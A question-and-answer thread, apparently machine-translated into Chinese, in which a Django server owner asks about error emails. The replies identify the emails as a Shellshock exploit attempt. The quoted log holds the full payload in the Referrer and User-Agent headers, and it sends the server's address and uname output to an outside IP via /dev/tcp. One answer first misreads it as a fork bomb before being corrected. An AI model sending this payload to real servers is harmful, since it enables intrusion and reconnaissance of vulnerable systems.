我已经设置django通过电子邮件提醒我,当任何请求失败,我不断收到这封电子邮件:
Referrer: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21" Requested URL: /cgi-bin/index.cgi User agent: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21" IP address: 127.0.0.1 这是什么意思? 我应该打扰吗?
我正在使用nginx,ubuntu,gunicorn。
这看起来像一个尝试的叉炸弹 :
() { :;};
幸运的是,如果您的服务器在发送之后仍在运行,则意味着它正在被清理或忽略。
正如@TheGreatContini指出,这实际上是一个企图Shellshock攻击 。 这使我的答案有点不安全。 它的价值在于确保您的服务器已完全打上补丁并保持最新状态,并检查所有传出流量以确保您没有受到影响。
这是一个尝试利用壳震动的弱点。